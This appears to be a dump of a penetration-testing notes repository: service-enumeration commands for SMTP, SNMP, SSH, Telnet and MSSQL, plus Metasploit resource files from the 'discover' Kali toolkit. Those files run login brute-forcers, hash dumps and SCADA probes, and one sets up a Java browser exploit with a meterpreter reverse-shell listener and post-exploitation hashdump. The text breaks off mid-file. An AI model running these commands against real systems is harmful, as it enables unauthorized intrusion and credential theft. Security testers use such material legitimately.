        print('[+] valid user: ' + user)

# close the socket
s.close()
--------------------------------------------------------------------------------
/ENUMERATION/SMTP/smtp_commands.txt:
--------------------------------------------------------------------------------
smtp-user-enum    // in Kali
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t 10.11.1.22

SMTP sendmail commands:

bash-2.05a$ telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 barry ESMTP Sendmail 8.11.6/8.11.6; Sun, 20 Aug 2017 00:01:02 +0300
help
214-2.0.0 This is sendmail version 8.11.6
214-2.0.0 Topics:
214-2.0.0     HELO    EHLO    MAIL    RCPT    DATA
214-2.0.0     RSET    NOOP    QUIT    HELP    VRFY
214-2.0.0     EXPN    VERB    ETRN    DSN     AUTH
214-2.0.0     STARTTLS
214-2.0.0 For more info use "HELP <topic>".
214-2.0.0 To report bugs in the implementation send email to
214-2.0.0     sendmail-bugs@sendmail.org.
214-2.0.0 For local information send email to Postmaster at your site.
214 2.0.0 End of HELP info
AUTH
503 5.3.3 AUTH mechanism not available
EHLO barry
250-barry Hello localhost [127.0.0.1], pleased to meet you
250-ENHANCEDSTATUSCODES
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ONEX
250-ETRN
250-XUSR
250 HELP
AUTH LOGIN

--------------------------------------------------------------------------------
/ENUMERATION/SNMP/commands.txt:
--------------------------------------------------------------------------------
== SNMP ==
nmap -sU -p 161 --script "snmp*" 192.168.1.200
xprobe2 -v -p udp:161:open 192.168.1.200

msf > use auxiliary/scanner/snmp/snmp_login
msf > use auxiliary/scanner/snmp/snmp_enum

snmp-check 192.168.1.2 -c public
snmpget -v 1 -c public IP
snmpwalk -v 1 -c public IP
snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP
onesixtyone -c /usr/share/wordlists/dirb/small.txt 192.168.1.200    // find communities with bruteforce

# find communities with bruteforce using a wordlist as the community list: one sysDescr GET per candidate,
# a wrong community times out and snmpget exits non-zero, so only the ones that answered are printed
for i in $(cat /usr/share/wordlists/metasploit/unix_users.txt); do snmpget -v 1 -c "$i" -t 1 -r 0 192.168.1.200 1.3.6.1.2.1.1.1.0 >/dev/null 2>&1 && echo "[+] community: $i"; done
--------------------------------------------------------------------------------
/ENUMERATION/SNMP/snmp-enumeration-snmpwalk-from-list.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# walk the Windows user-account table (OID 1.3.6.1.4.1.77.1.2.25) on every host in a list
#for mib in $(cat /root/exercises/mibs.txt);do snmpwalk -c public -v1 $ip $mib;done
#while read i ; do snmpwalk -c public -v1 $ip $i ; done < /root/exercises/mibs.txt

for ip in $(cat /root/exercises/snmphosts2.txt); do snmpwalk -c public -v1 "$ip" 1.3.6.1.4.1.77.1.2.25; done
--------------------------------------------------------------------------------
/ENUMERATION/SQL/Microsoft_SQL.txt:
--------------------------------------------------------------------------------
nmap -p 1433 --script \
ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip
--------------------------------------------------------------------------------
/ENUMERATION/SSH/commands.txt:
--------------------------------------------------------------------------------

== SSH user enumeration ==

1) exploit-db 40136 (OpenSSH <= 7.2p2 username enumeration, CVE-2016-6210: valid and invalid users take a different time to reject)
python ./40136.py 192.168.31.149 -U /usr/share/wordlists/metasploit/unix_users.txt -e --trials 5 --bytes 10

2)
msf > use auxiliary/scanner/ssh/ssh_enumusers
msf auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 192.168.31.149
RHOSTS => 192.168.31.149
msf auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt
USER_FILE => /usr/share/wordlists/metasploit/unix_users.txt
msf auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 192.168.31.149:22 - SSH - Checking for false positives
[*] 192.168.31.149:22 - SSH - Starting scan
[-] 192.168.31.149:22 - SSH - User '4Dgifts' not found
[-] 192.168.31.149:22 - SSH - User 'EZsetup' not found
[-] 192.168.31.149:22 - SSH - User 'OutOfBox' not found
--------------------------------------------------------------------------------
/ENUMERATION/TELNET/telnet_commands.txt:
--------------------------------------------------------------------------------

nmap -p 23 --script telnet-brute --script-args userdb=/usr/share/metasploit-framework/data/wordlists/unix_users,passdb=/usr/share/wordlists/rockyou.txt,telnet-brute.timeout=20s 10.11.1.22

== metasploit ==
1.
telnet bruteforce

use auxiliary/scanner/telnet/telnet_login
msf auxiliary(telnet_login) > set BLANK_PASSWORDS false
BLANK_PASSWORDS => false
msf auxiliary(telnet_login) > set PASS_FILE passwords.txt
PASS_FILE => passwords.txt
msf auxiliary(telnet_login) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(telnet_login) > set THREADS 254
THREADS => 254
msf auxiliary(telnet_login) > set USER_FILE users.txt
USER_FILE => users.txt
msf auxiliary(telnet_login) > set VERBOSE false
VERBOSE => false
msf auxiliary(telnet_login) > run

msf auxiliary(telnet_login) > sessions -l    // to see the sessions that succeeded

2. telnet version
use auxiliary/scanner/telnet/telnet_version
msf auxiliary(telnet_version) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(telnet_version) > set THREADS 254
THREADS => 254
msf auxiliary(telnet_version) > run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/.gitignore:
--------------------------------------------------------------------------------
*.gnmap
*.nmap
*.xml
.idea
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/LICENCE:
--------------------------------------------------------------------------------
Copyright (c) 2015, Lee Baird
All rights reserved.

Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:

* Redistributions of source code must retain the above copyright notice, this
  list of conditions and the following disclaimer.

* Redistributions in binary form must reproduce the above copyright notice,
  this list of conditions and the following disclaimer in the documentation
  and/or other materials provided with the distribution.

* Neither the name of [project] nor the names of its
  contributors may be used to endorse or promote products derived from
  this software without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/README.md:
--------------------------------------------------------------------------------
For use with Kali Linux. Custom bash scripts used to automate various pentesting tasks.

# Licence

This project is licensed under the ```BSD 3-clause "New" or "Revised" License```. For more information please see the licence file

### Download, setup & usage
* git clone git://github.com/leebaird/discover.git /opt/discover/
* All scripts must be run from this location.
* cd /opt/discover/
* ./setup.sh
* ./discover.sh

```
RECON
1.  Domain
2.  Person
3.
Parse salesforce

SCANNING
4.  Generate target list
5.  CIDR
6.  List
7.  IP or domain

WEB
8.  Open multiple tabs in Iceweasel
9.  Nikto
10. SSL

MISC
11. Crack WiFi
12. Parse XML
13. Start a Metasploit listener
14. Update
15. Exit
```
## RECON
### Domain
```
RECON

1.  Passive
2.  Active
3.  Previous menu
```

* Passive combines goofile, goog-mail, goohost, theHarvester, Metasploit, dnsrecon, URLCrazy, Whois and multiple websites.
* Active combines Nmap, dnsrecon, Fierce, lbd, WAFW00F, traceroute and Whatweb.

### Person
```
RECON

First name:
Last name:
```

* Combines info from multiple websites.

### Parse salesforce
```
Create a free account at salesforce (https://connect.data.com/login).
Perform a search on your target company > select the company name > see all.
Copy the results into a new file.

Enter the location of your list:
```

* Gather names and positions into a clean list.

## SCANNING
### Generate target list
```
SCANNING

1.  Local area network
2.  NetBIOS
3.  netdiscover
4.  Ping sweep
5.  Previous menu
```

* Use different tools to create a target list including Angry IP Scanner, arp-scan, netdiscover and nmap pingsweep.

### CIDR, List, IP or domain
```
Type of scan:

1.  External
2.  Internal
3.  Previous menu
```

* External scan will set the nmap source port to 53 and the max-rtt-timeout to 1500ms.
* Internal scan will set the nmap source port to 88 and the max-rtt-timeout to 500ms.
* Nmap is used to perform host discovery, port scanning, service enumeration and OS identification.
* Matching nmap scripts are used for additional enumeration.
* Matching Metasploit auxiliary modules are also leveraged.

## WEB
### Open multiple tabs in Iceweasel
```
Open multiple tabs in Iceweasel with:

1.  List
2.  Directories from a domain's robots.txt.
3.  Previous menu
```

* Use a list containing IPs and/or URLs.
* Use wget to pull a domain's robots.txt file, then open all of the directories.

### Nikto
```
Run multiple instances of Nikto in parallel.

1.  List of IPs.
2.  List of IP:port.
3.  Previous menu
```
### SSL
```
Check for SSL certificate issues.

Enter the location of your list:
```

* Use sslscan and sslyze to check for SSL/TLS certificate issues.


## MISC
### Crack WiFi

* Crack wireless networks.

### Parse XML
```
Parse XML to CSV.

1.  Burp (Base64)
2.  Nessus
3.  Nexpose
4.  Nmap
5.  Qualys
6.  Previous menu
```

### Start a Metasploit listener

* Setup a multi/handler with a windows/meterpreter/reverse_tcp payload on port 443.


### Update

* Use to update Kali Linux, Discover scripts, various tools and the locate database.
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/alias:
--------------------------------------------------------------------------------
# To enable these aliases or when you modify this file:
# cp /opt/discover/alias /root/.bash_aliases ; source /root/.bash_aliases

dns=$(grep 'nameserver' /etc/resolv.conf | awk '{print $2}')
interface=$(ifconfig | grep -B1 'inet addr' | egrep -v '(-|inet addr|Loopback)' | cut -d ' ' -f1)
ip=$(ifconfig | grep 'Bcast' | awk '{print$2}' | cut -d ':' -f2)
mac=$(ifconfig | grep -B1 'inet addr' | egrep -v '(-|inet addr|Loopback)' | awk '{print$5}')

alias c='clear'
alias cl='clear ; ls -l'
alias d='cd /root/Desktop/ ; clear'
alias e='exit'
alias i='echo ; echo ; echo "DNS " $dns ; echo ; ifconfig ; ping google.com -c3 ; echo ; echo'
alias l='ls -l'
alias n='echo ; netstat -antup | egrep -v "Active" ; echo ;
echo -n "Interface: "$interface ; echo ;
echo -n "MAC address: "$mac ; echo ;
echo -n "Internal IP: "$ip ; echo ;
echo -n "External IP: " ; curl ifconfig.me ; echo'
alias r='cd /root/ ; clear'
alias s='cd /opt/discover/ ; clear'

alias nexpose='service postgresql stop ; cd /opt/rapid7/nexpose/nsc ; ./nsc.sh'

alias sip='sort -V'

alias update='/opt/discover/update.sh'
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/misc/compare-sites.sh:
--------------------------------------------------------------------------------
#!/bin/bash

clear

break="=================================================="
DIR=/root/Desktop/compare-sites
DIFFONLY=false

usage(){
    echo
    echo
    echo "Compare changes to home pages."
    echo
    echo
    echo "Where file contains a list of URLs to be compared."
    echo "Usage: $0 [options] file"
    echo
    echo "Options:"
    echo "  -c    Compare versions."
    echo "  -o    Output directory. Default: /root/Desktop/compare-sites"
    echo
    echo
}

# Convert a Unix timestamp (seconds since the epoch) to a readable date.
ts2date(){
    date -d "@$1"
}

while getopts "o:c" OPTION; do
    case $OPTION in
        o) DIR="$OPTARG";;
        c) DIFFONLY=true;;
        *) echo && echo && exit;;
    esac
done

shift $(($OPTIND - 1))
FILE=$*

if [ -z "$FILE" ]; then
    usage
    exit
fi

if [ ! -f "$FILE" ]; then
    echo
    echo
    echo "File does not exist."
    echo
    echo
    exit
fi

if [ ! -d "$DIR" ]; then
    mkdir "$DIR"
fi

# Each URL list gets its own directory, named by the SHA-256 of the list file.
# Only the hash field of sha256sum's output is kept, not the input file name.
FILEHASH=$(sha256sum "$FILE" | cut -d ' ' -f1)
HDIR="$DIR/$FILEHASH"
mkdir -p "$HDIR"
VERSION=1

# Version files 1, 2, ... each hold the timestamp of one download run.
while [ -f "$HDIR/$VERSION" ]; do
    VERSION=$(($VERSION + 1))
done

if ! $DIFFONLY; then
    date +%s > "$HDIR/$VERSION"
    echo
    echo
    echo "Downloading:"

    # Saved pages are named URL-HASH-VERSION, so the URLs in the list must not
    # contain '/' (e.g. example.com rather than http://example.com/).
    for URL in $(cat "$FILE"); do
        HASH=$(sha256sum <<<"$URL" | tr -d " -")
        echo "[*] $URL"
        wget -q "$URL" -O "$HDIR/$URL-$HASH-$VERSION"
    done

    echo
    echo $break
else
    VERSION=$(($VERSION - 1))
fi

if [ $VERSION -gt 1 ]; then
    echo
    echo "Versions:"

    for ((i=1; i<=${VERSION}; i++)); do
        echo $i - $(ts2date $(cat "$HDIR/$i"))
    done

    echo
    echo -n "Base version: "
    read A
    echo -n "Compare with: "
    read B

    [ -z "$A" ] && A="1"
    [ -z "$B" ] && B=$VERSION

    for URL in $(cat "$FILE"); do
        echo
        echo $break
        echo
        echo -e "\e[1;34m$URL\e[0m"
        HASH=$(sha256sum <<<"$URL" | tr -d " -")
        # The grep filter on the next line, and the remainder of the script, are cut off in this copy.
        diff "$HDIR/$URL-$HASH-$A" "$HDIR/$URL-$HASH-$B" | grep '
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/adobe.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 8400

use auxiliary/scanner/http/adobe_xml_inject
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/afp.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 548

use auxiliary/scanner/afp/afp_server_info
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/backdoor.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 7777

use auxiliary/scanner/backdoor/energizer_duo_detect
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/chargen.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 19

use auxiliary/scanner/chargen/chargen_probe
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/citrix.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 1604

use gather/citrix_published_applications
run

use gather/citrix_published_bruteforce
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/couchdb.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 5984

use auxiliary/scanner/couchdb/couchdb_login
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/db2-2.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 50000

use auxiliary/scanner/db2/db2_version
run

use auxiliary/scanner/db2/db2_auth
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/db2.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 523

use auxiliary/scanner/db2/discovery
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/dcerpc.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 135

use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/dcerpc2.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 5040

use auxiliary/scanner/dcerpc/windows_deployment_services
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/emc.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 3000

use auxiliary/admin/emc/alphastor_devicemanager
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/emc2.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 3500

use auxiliary/admin/emc/alphastor_librarymanager
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/finger.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 79

use auxiliary/scanner/finger/finger_users
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/ftp.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 21

use auxiliary/scanner/ftp/ftp_version
run

use auxiliary/scanner/ftp/anonymous
run

use auxiliary/scanner/ftp/titanftp_xcrc_traversal
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/h323.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 1720

use auxiliary/scanner/h323/h323_version
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/http.rc:
--------------------------------------------------------------------------------
setg DOMAIN
setg HTTPBL_APIKEY
setg PATH_SAVE /root
setg RANGE
setg RHOST
setg RHOSTS
setg SQLMAP_PATH /pentest/database/sqlmap
setg THREADS 255
setg VULNCSV

ipidseq # from ip

lotus_domino_hashes # from lotus
lotus_domino_login # from lotus
lotus_domino_version # from lotus
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/imap.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 143

use auxiliary/scanner/imap/imap_version
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/ipmi.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 623

use auxiliary/scanner/ipmi/ipmi_cipher_zero
run

use auxiliary/scanner/ipmi/ipmi_version
run

use auxiliary/scanner/ipmi/ipmi_dumphashes
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/lotus.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 80

use auxiliary/scanner/lotus/lotus_domino_hashes
run

use auxiliary/scanner/lotus/lotus_domino_version
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/misc.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 5920

use auxiliary/scanner/misc/cctv_dvr_login
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/misc/java.rc:
--------------------------------------------------------------------------------
use exploit/multi/browser/java_jre17_jmxbean
set SRVPORT 443
set URIPATH /
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST
set LPORT 443
set InitialAutoRunScript migrate -f
exploit
set AutoRunScript /opt/scripts/resource/post.rc

--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/misc/listener.rc:
--------------------------------------------------------------------------------
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST #
set LPORT 443
set ExitOnSession false
set InitialAutoRunScript migrate -f


sleep(3)


exploit -j
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/misc/post.rc:
--------------------------------------------------------------------------------
getsystem
sysinfo
hasdump

--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/motorola.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 407

use auxiliary/scanner/motorola/timbuktu_udp
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/mssql.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 1433

use scanner/mssql/mssql_ping
run

use scanner/mssql/mssql_login
run

use scanner/mssql/mssql_hashdump
run

use scanner/mssql/mssql_schemadump
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/mysql.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 3306

use auxiliary/scanner/mysql/mysql_version
run

use scanner/mysql/mysql_authbypass_hashdump
run

--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/nessus.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 8834

use auxiliary/scanner/nessus/nessus_xmlrpc_ping
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/netbios.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 137

use auxiliary/scanner/netbios/nbname
run

use auxiliary/scanner/netbios/nbname_probe
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/nfs.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 111

use auxiliary/scanner/misc/sunrpc_portmapper
run

use auxiliary/scanner/nfs/nfsmount
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/ntp.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 123

use auxiliary/scanner/ntp/ntp_monlist
run

use auxiliary/scanner/ntp/ntp_readvar
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/oracle.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 1158

use auxiliary/scanner/oracle/emc_sid
run

use auxiliary/scanner/oracle/spy_sid
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/oracle2.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 5560

use auxiliary/scanner/oracle/isqlplus_login
run

use auxiliary/scanner/oracle/isqlplus_sidbrute
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/oracle3.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 1521

use auxiliary/scanner/oracle/oracle_hashdump
run

use auxiliary/scanner/oracle/oracle_login
run

use auxiliary/scanner/oracle/sid_brute
run

use auxiliary/scanner/oracle/sid_enum
run

use auxiliary/scanner/oracle/tnslsnr_version
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/oracle4.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 8080

use auxiliary/scanner/oracle/xdb_sid_brute
run

use auxiliary/scanner/oracle/xdb_sid
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/pcanywhere.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 5631

use auxiliary/scanner/pcanywhere/pcanywhere_tcp
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/pcanywhere2.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 5632

use auxiliary/scanner/pcanywhere/pcanywhere_udp
run

--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/pop3.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 110

use auxiliary/scanner/pop3/pop3_version
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/postgres.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 5432

use auxiliary/scanner/postgres/postgres_dbname_flag_injection
run

use auxiliary/scanner/postgres/postgres_hashdump
run

use auxiliary/scanner/postgres/postgres_login
run

use auxiliary/scanner/postgres/postgres_schemadump
run

use auxiliary/scanner/postgres/postgres_version
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/printers.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 9100

use auxiliary/scanner/printer/printer_download_file
run

use auxiliary/scanner/printer/printer_env_vars
run

use auxiliary/scanner/printer/printer_list_dir
run

use auxiliary/scanner/printer/printer_list_volumes
run

use auxiliary/scanner/printer/printer_ready_message
run

use auxiliary/scanner/printer/printer_version_info
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/rdp.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 3389

use auxiliary/scanner/rdp/ms12_020_check
run

--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/recon-ng/active.rc:
--------------------------------------------------------------------------------
workspaces add yyy
add companies
xxx
none
add domains
yyy

use recon/domains-hosts/brute_hosts
run

use recon/domains-hosts/ssl_san
run

use recon/domains-hosts/vpnhunter
run

use discovery/info_disclosure/cache_snoop
run

use discovery/info_disclosure/interesting_files
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/recon-ng/export.rc:
--------------------------------------------------------------------------------
spool start /opt/discover/tmp
show contacts
spool stop
spool start /opt/discover/tmp2
show creds
spool stop
spool start /opt/discover/tmp3
show hosts
spool stop
spool start /opt/discover/tmp4
show leaks
spool stop
spool start /opt/discover/tmp5
show ports
spool stop
spool start /opt/discover/tmp6
show vulnerabilities
spool stop
back
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/recon-ng/passive.rc:
--------------------------------------------------------------------------------
workspaces add yyy
add companies
xxx
none
add domains
yyy

use recon/domains-hosts/baidu_site
run

use recon/domains-hosts/bing_domain_api
run

use recon/domains-hosts/bing_domain_web
run

use recon/domains-hosts/google_site_api
run

use recon/domains-hosts/google_site_web
run

use recon/domains-hosts/netcraft
run

use recon/domains-hosts/shodan_hostname
run

use recon/domains-hosts/yahoo_site
run

use recon/domains-vulnerabilities/punkspider
run

use recon/domains-vulnerabilities/xssed
run

use recon/hosts-hosts/bing_ip
run

use recon/hosts-hosts/ip_neighbor
run

use recon/hosts-hosts/ipinfodb
run

use recon/hosts-hosts/resolve
run

use recon/domains-contacts/builtwith
run

use recon/domains-contacts/pgp_search
run

use recon/domains-contacts/whois_pocs
run

use recon/companies-contacts/facebook
run

use recon/contacts-contacts/rapportive
run

use recon/contacts-creds/haveibeenpwned
run

use recon/contacts-creds/pwnedlist
run

use recon/contacts-creds/should_change_password
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/redis.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 6379

use auxiliary/scanner/misc/redis_server
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/rmi.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 1099

use auxiliary/scanner/misc/java_rmi_server
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/rservices.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 512

use auxiliary/scanner/rservices/rexec_login
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/rservices2.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 513

use auxiliary/scanner/rservices/rlogin_login
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/rservices3.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 514

use auxiliary/scanner/rservices/rsh_login
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/scada.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 2362

use auxiliary/scanner/scada/digi_addp_reboot
run

use auxiliary/scanner/scada/digi_addp_version
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/scada2.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 771

use auxiliary/scanner/scada/digi_realport_serialport_scan
run

use auxiliary/scanner/scada/digi_realport_version
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/scada3.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 80

use auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/scada4.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 28784

| use auxiliary/scanner/scada/koyo_login 6 | run 7 | -------------------------------------------------------------------------------- /ENUMERATION/discover-master/resource/scada5.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 502 4 | 5 | use auxiliary/scanner/scada/modbusclient 6 | run 7 | 8 | use auxiliary/scanner/scada/modbusdetect 9 | run 10 | 11 | use auxiliary/scanner/scada/modbus_findunitid 12 | run 13 | -------------------------------------------------------------------------------- /ENUMERATION/discover-master/resource/scada6.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 46824 4 | 5 | use auxiliary/scanner/scada/sielco_winlog_fileaccess 6 | run 7 | -------------------------------------------------------------------------------- /ENUMERATION/discover-master/resource/sip.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 5060 4 | 5 | use auxiliary/scanner/sip/enumerator 6 | run 7 | 8 | use auxiliary/scanner/sip/options 9 | run 10 | -------------------------------------------------------------------------------- /ENUMERATION/discover-master/resource/sip2.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 5060 4 | 5 | use auxiliary/scanner/sip/enumerator_tcp 6 | run 7 | 8 | use auxiliary/scanner/sip/options_tcp 9 | run 10 | -------------------------------------------------------------------------------- /ENUMERATION/discover-master/resource/smb.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 445 4 | 5 | use auxiliary/scanner/smb/pipe_auditor 6 | run 7 | 8 | use 
